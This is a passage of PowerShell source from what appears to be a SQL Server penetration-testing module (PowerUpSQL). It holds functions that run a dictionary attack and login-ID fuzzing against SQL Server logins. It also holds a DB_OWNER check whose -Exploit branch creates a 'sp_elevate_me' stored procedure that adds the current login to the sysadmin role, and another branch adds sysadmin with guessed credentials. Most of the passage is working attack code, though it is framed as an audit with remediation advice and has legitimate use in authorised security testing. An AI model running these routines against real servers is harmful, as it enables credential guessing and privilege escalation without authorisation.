SCHEMA permissions so procedures can be created.\"\n                            Write-Verbose -Message \"$Instance : - Dependancies were met: $CurrentPrincipal has ALTER SCHEMA permissions.\"\n\n                            # Add to report example\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, \"$Details$Dependancies\", $Reference, $Author)\n                        }\n                        else\n                        {\n                            $IsExploitable = 'No'\n\n                            # Add to report example\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                        }\n\n                        # -----------------------------------------------------------------\n                        # Exploit Vulnerability\n                        # Note: Add the current user to sysadmin fixed server role\n                        # -----------------------------------------------------------------\n\n                        if($Exploit -and $IsExploitable -eq 'Yes')\n                        {\n                            Write-Verbose -Message \"$Instance : - No server escalation method is available at this time.\"\n                        }\n                    }\n                }\n            }\n        }\n        else\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : - The current login doesn't have the CREATE PROCEDURE permission in any databases.\"\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditWeakLoginPw\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditWeakLoginPw\n{\n    <#\n            .SYNOPSIS\n            Perform dictionary attack for common passwords. By default, it will enumerate\n            SQL Server logins and the current login and test for \"username\" as password\n            for each enumerated login.\n            .PARAMETER Username\n            Known SQL Server login to obtain a list of logins with for testing.\n            .PARAMETER TestUsername\n            SQL Server or domain account to authenticate with.\n            .PARAMETER UserFile\n            Path to list of users to use.  One per line.\n            .PARAMETER Password\n            Known SQL Server login password to obtain a list of logins with for testing.\n            .PARAMETER TestPassword\n            Password to test provided or discovered logins with.\n            .PARAMETER PassFile\n            Path to list of password to use.  One per line.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER NoUserAsPass\n            Don't try to login using the login name as the password.\n            .PARAMETER NoUserEnum\n            Don't try to enumerate logins to test.\n            .PARAMETER StartId\n            Start id for fuzzing login IDs when authenticating as a least privilege login.\n            .PARAMETER EndId\n            End id for fuzzing login IDs when authenticating as a least privilege login.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Invoke-SQLAuditWeakLoginPw -Username myuser -Password mypassword\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Weak Login Password\n            Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.\n            Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : No\n            ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.\n            Details       : The testuser (Not Sysadmin) is configured with the password testuser.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\Express\n            Vulnerability : Weak Login Password\n            Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.\n            Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : No\n            ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.\n            Details       : The testadmin (Sysadmin) is configured with the password testadmin.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditWeakLoginPw -Verbose -Instance SQLServer1\\STANDARDDEV2014\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Known SQL Server login to fuzz logins with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Username to test.')]\n        [string]$TestUsername = 'sa',\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Path to list of users to use.  One per line.')]\n        [string]$UserFile,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Known SQL Server password to fuzz logins with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server password to attempt to login with.')]\n        [string]$TestPassword,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Path to list of passwords to use.  One per line.')]\n        [string]$PassFile,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'User is tested as pass by default. This setting disables it.')]\n        [switch]$NoUserAsPass,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't attempt to enumerate logins from the server.\")]\n        [switch]$NoUserEnum,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of Principal IDs to fuzz.')]\n        [string]$FuzzNum = 10000,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [switch]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Weak Login Password\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password.\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n        $CurrentUSerSysadmin = $ServerInfo.IsSysadmin\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Weak Login Password'\n        $Description   = 'One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.'\n        $Remediation   = 'Ensure all SQL Server logins are required to use a strong password. Consider inheriting the OS password policy.'\n        $Severity      = 'High'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.'\n        $Details       = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms161959.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Create empty user / password lists\n        $LoginList = @()\n        $PasswordList = @()\n\n        # Get logins for testing - file\n        if($UserFile)\n        {\n            Write-Verbose -Message \"$Instance - Getting logins from file...\"\n            Get-Content -Path $UserFile |\n            ForEach-Object -Process {\n                $LoginList += $_\n            }\n        }\n\n        # Get logins for testing - variable\n        if($TestUsername)\n        {\n            Write-Verbose -Message \"$Instance - Getting supplied login...\"\n            $LoginList += $TestUsername\n        }\n\n        # Get logins for testing - fuzzed\n        if(-not $NoUserEnum)\n        {\n            # Test connection to instance\n            $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n                $_.Status -eq 'Accessible'\n            }\n            if($TestConnection)\n            {\n                # Check if sysadmin\n                $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                if($IsSysadmin -eq 'Yes')\n                {\n                    # Query for logins\n                    Write-Verbose -Message \"$Instance - Getting list of logins...\"\n                    Get-SQLServerLogin -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose |\n                    Where-Object -FilterScript {\n                        $_.PrincipalType -eq 'SQL_LOGIN'\n                    } |\n                    Select-Object -Property PrincipalName -ExpandProperty PrincipalName |\n                    ForEach-Object -Process {\n                        $LoginList += $_\n                    }\n                }\n                else\n                {\n                    # Fuzz logins\n                    Write-Verbose -Message \"$Instance - Fuzzing principal IDs $StartId to $EndId...\"\n                    Get-SQLFuzzServerLogin -Instance $Instance -GetPrincipalType -Username $Username -Password $Password -Credential $Credential -FuzzNum $FuzzNum -SuppressVerbose |\n                    Where-Object -FilterScript {\n                        $_.PrincipleType -eq 'SQL Login'\n                    } |\n                    Select-Object -Property PrincipleName -ExpandProperty PrincipleName |\n                    ForEach-Object -Process {\n                        $LoginList += $_\n                    }\n                }\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance - Connection Failed - Could not authenticate with provided credentials.\"\n                }\n                return\n            }\n        }\n\n        # Check for users or return - count array\n        if($LoginList.count -eq 0 -and (-not $FuzzLogins))\n        {\n            Write-Verbose -Message \"$Instance - No logins have been provided.\"\n            return\n        }\n\n        # Get passwords for testing - file\n        if($PassFile)\n        {\n            Write-Verbose -Message \"$Instance - Getting password from file...\"\n            Get-Content -Path $PassFile |\n            ForEach-Object -Process {\n                $PasswordList += $_\n            }\n        }\n\n        # Get passwords for testing - variable\n        if($TestPassword)\n        {\n            Write-Verbose -Message \"$Instance - Getting supplied password...\"\n            $PasswordList += $TestPassword\n        }\n\n        # Check for provided passwords\n        if($PasswordList.count -eq 0 -and ($NoUserAsPass))\n        {\n            Write-Verbose -Message \"$Instance - No passwords have been provided.\"\n            return\n        }\n\n        # Iternate through logins and perform dictionary attack\n        Write-Verbose -Message \"$Instance - Performing dictionary attack...\"\n        $LoginList |\n        Select-Object -Unique |\n        ForEach-Object -Process {\n            $TargetLogin = $_\n            $PasswordList |\n            Select-Object -Unique |\n            ForEach-Object -Process {\n                $TargetPassword = $_\n\n                $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetPassword -SuppressVerbose |\n                Where-Object -FilterScript {\n                    $_.Status -eq 'Accessible'\n                }\n                if($TestPass)\n                {\n                    # Check if guess credential is a sysadmin\n                    $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetPassword -SuppressVerbose |\n                    Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                    if($IsSysadmin -eq 'Yes')\n                    {\n                        $SysadminStatus = 'Sysadmin'\n                    }\n                    else\n                    {\n                        $SysadminStatus = 'Not Sysadmin'\n                    }\n\n                    Write-Verbose -Message \"$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetPassword\"\n\n                    if($Exploit)\n                    {\n                        Write-Verbose -Message \"$Instance - Trying to make you a sysadmin...\"\n\n                        # Check if the current login is a sysadmin\n                        $IsSysadmin1 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose |\n                        Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                        if($IsSysadmin1 -eq 'Yes')\n                        {\n                            Write-Verbose -Message \"$Instance - You're already a sysadmin. Nothing to do.\"\n                        }\n                        else\n                        {\n                            Write-Verbose -Message \"$Instance - You're not currently a sysadmin. Let's change that...\"\n\n                            # Add current user as sysadmin if login was successful\n                            Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetPassword -Credential $Credential -Query \"EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'\" -SuppressVerbose\n\n                            # Check if the current login is a sysadmin again\n                            $IsSysadmin2 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose |\n                            Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                            if($IsSysadmin2 -eq 'Yes')\n                            {\n                                $Exploited = 'Yes'\n                                Write-Verbose -Message \"$Instance - SUCCESS! You're a sysadmin now.\"\n                            }\n                            else\n                            {\n                                $Exploited = 'No'\n                                Write-Verbose -Message \"$Instance - Fail. We coudn't add you as a sysadmin.\"\n                            }\n                        }\n                    }\n\n                    # Add record\n                    $Details = \"The $TargetLogin ($SysadminStatus) is configured with the password $TargetPassword.\"\n                    $IsVulnerable = 'Yes'\n                    $IsExploitable = 'Yes'\n                    $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance - Failed Login: User = $TargetLogin Password = $TargetPassword\"\n                }\n            }\n        }\n\n        # Test user as pass\n        if(-not $NoUserAsPass)\n        {\n            $LoginList |\n            Select-Object -Unique |\n            ForEach-Object -Process {\n                $TargetLogin = $_\n                $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetLogin -SuppressVerbose |\n                Where-Object -FilterScript {\n                    $_.Status -eq 'Accessible'\n                }\n                if($TestPass)\n                {\n                    # Check if user/name combo has sysadmin\n                    $IsSysadmin3 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetLogin -SuppressVerbose |\n                    Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                    if($IsSysadmin3 -eq 'Yes')\n                    {\n                        $SysadminStatus = 'Sysadmin'\n                    }\n                    else\n                    {\n                        $SysadminStatus = 'Not Sysadmin'\n                    }\n\n                    Write-Verbose -Message \"$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetLogin\"\n\n                    if(($Exploit) -and $IsSysadmin3 -eq 'Yes')\n                    {\n                        # Check if the current login is a sysadmin\n                        $IsSysadmin4 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose |\n                        Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                        if($IsSysadmin4 -eq 'Yes')\n                        {\n                            Write-Verbose -Message \"$Instance - You're already a sysadmin. Nothing to do.\"\n                        }\n                        else\n                        {\n                            Write-Verbose -Message \"$Instance - You're not currently a sysadmin. Let's change that...\"\n\n                            # Add current user as sysadmin if login was successful\n                            Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetLogin -Credential $Credential -Query \"EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'\" -SuppressVerbose\n\n                            # Check if the current login is a sysadmin again\n                            $IsSysadmin5 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose |\n                            Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n                            if($IsSysadmin5 -eq 'Yes')\n                            {\n                                $Exploited = 'Yes'\n                                Write-Verbose -Message \"$Instance - SUCCESS! You're a sysadmin now.\"\n                            }\n                            else\n                            {\n                                $Exploited = 'No'\n                                Write-Verbose -Message \"$Instance - Fail. We coudn't add you as a sysadmin.\"\n                            }\n                        }\n                    }\n\n                    # Add record\n                    $Details = \"The $TargetLogin ($SysadminStatus) principal is configured with the password $TargetLogin.\"\n                    $IsVulnerable = 'Yes'\n                    $IsExploitable = 'Yes'\n                    $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                }\n                else\n                {\n                    Write-Verbose -Message \"$Instance - Failed Login: User = $TargetLogin Password = $TargetLogin\"\n                }\n            }\n        }\n\n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        # $IsExploitable = \"No\" or $IsExploitable = \"Yes\"\n        # Check if the link is alive and verify connection + check if sysadmin\n\n\n        # -----------------------------------------------------------------\n        # Exploit Vulnerability\n        # Note: Add the current user to sysadmin fixed server role\n        # -----------------------------------------------------------------\n        # $Exploited = \"No\" or $Exploited     = \"Yes\"   - check if login is a sysadmin\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData | Sort-Object -Property computername, instance, details\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditRoleDbOwner\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditRoleDbOwner\n{\n    <#\n            .SYNOPSIS\n            Check if the current login has the db_owner role in any databases.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\\STANDARDDEV2014 -Username myuser -Password mypassword\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : DATABASE ROLE - DB_OWNER\n            Description   : The login has the DB_OWER role in one or more databases.  This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and\n            owned by a sysadmin.\n            Remediation   : If the permission is not required remove it.  Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with\n            a command like:  EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser'\n            Severity      : Medium\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : No\n            ExploitCmd    : Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\\STANDARDDEV2014 -Username myuser -Password mypassword -Exploit\n            Details       : myuser has the DB_OWNER role in the testdb database.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbOwner -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS\"\n        }\n\n        # Grab server, login, and role information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $ComputerName = $ServerInfo.ComputerName\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin  -SuppressVerbose\n        $CurrentPrincpalList = @()\n        $CurrentPrincpalList += $CurrentLogin\n        $CurrentPrincpalList += 'Public'\n        $CurrentLoginRoles | ForEach-Object -Process {\n            $CurrentPrincpalList += $_.RolePrincipalName\n        }\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'DATABASE ROLE - DB_OWNER'\n        $Description   = 'The login has the DB_OWER role in one or more databases.  This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin.'\n        $Remediation   = \"If the permission is not required remove it.  Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with a command like:  EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser'\"\n        $Severity      = 'Medium'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        if($Username)\n        {\n            $ExploitCmd    = \"Invoke-SQLAuditRoleDbOwner -Instance $Instance -Username $Username -Password $Password -Exploit\"\n        }\n        else\n        {\n            $ExploitCmd    = \"Invoke-SQLAuditRoleDbOwner -Instance $Instance -Exploit\"\n        }\n        $Details       = ''\n        $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted.'\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Iterate through each current login and their associated roles\n        $CurrentPrincpalList|\n        ForEach-Object -Process {\n            # Check if login or role has the DB_OWNER roles in any databases\n            $DBOWNER = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_OWNER -PrincipalName $_ -SuppressVerbose\n\n            # -----------------------------------------------------------------\n            # Check for exploit dependancies\n            # Note: Typically secondary configs required for dba/os execution\n            # -----------------------------------------------------------------\n\n            # Check for db ownerships\n            if($DBOWNER)\n            {\n                # Add an entry for each database where the user has the db_owner role\n                $DBOWNER|\n                ForEach-Object -Process {\n                    $DatabaseTarget = $_.DatabaseName\n                    $PrincipalTarget = $_.PrincipalName\n\n                    Write-Verbose -Message \"$Instance : - $PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database.\"\n                    $IsVulnerable = 'Yes'\n\n                    # Check if associated database is trusted and the owner is a sysadmin\n                    $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript {\n                        $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1\n                    }\n\n                    if($Depends)\n                    {\n                        $IsExploitable = 'Yes'\n                        Write-Verbose -Message \"$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable.\"\n\n                        # -----------------------------------------------------------------\n                        # Exploit Vulnerability\n                        # Note: Add the current user to sysadmin fixed server role\n                        # -----------------------------------------------------------------\n                        if($Exploit)\n                        {\n                            # Check if user is already a sysadmin\n                            $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                            if($SysadminPreCheck -eq 0)\n                            {\n                                # Status user\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin.\"\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions...\"\n\n                                $SpQuery = \"CREATE PROCEDURE sp_elevate_me\n                                    WITH EXECUTE AS OWNER\n                                    AS\n                                    begin\n                                    EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'\n                                end;\"\n\n                                # Add sp_elevate_me stored procedure\n                                $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"$SpQuery\" -SuppressVerbose -Database $DatabaseTarget\n\n                                # Run sp_elevate_me stored procedure\n                                $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget\n\n                                # Remove sp_elevate_me stored procedure\n                                $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'DROP PROC sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget\n\n                                # Verify the login was added successfully\n                                $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                                if($SysadminPostCheck -eq 1)\n                                {\n                                    Write-Verbose -Message \"$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!\"\n                                    $Exploited = 'Yes'\n                                }\n                                else\n                                {\n\n                                }\n                            }\n                            else\n                            {\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin.\"\n                            }\n\n                            #Add record\n                            $Details = \"$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database.\"\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                        }\n                        else\n                        {\n                            #Add record\n                            $Details = \"$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database.\"\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                        }\n                    }\n                    else\n                    {\n                        #Add record\n                        Write-Verbose -Message \"$Instance : - The $DatabaseTarget is not exploitable.\"\n                        $Details = \"$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database, but this was not exploitable.\"\n                        $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                    }\n                }\n            }\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditRoleDbDdlAdmin\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction 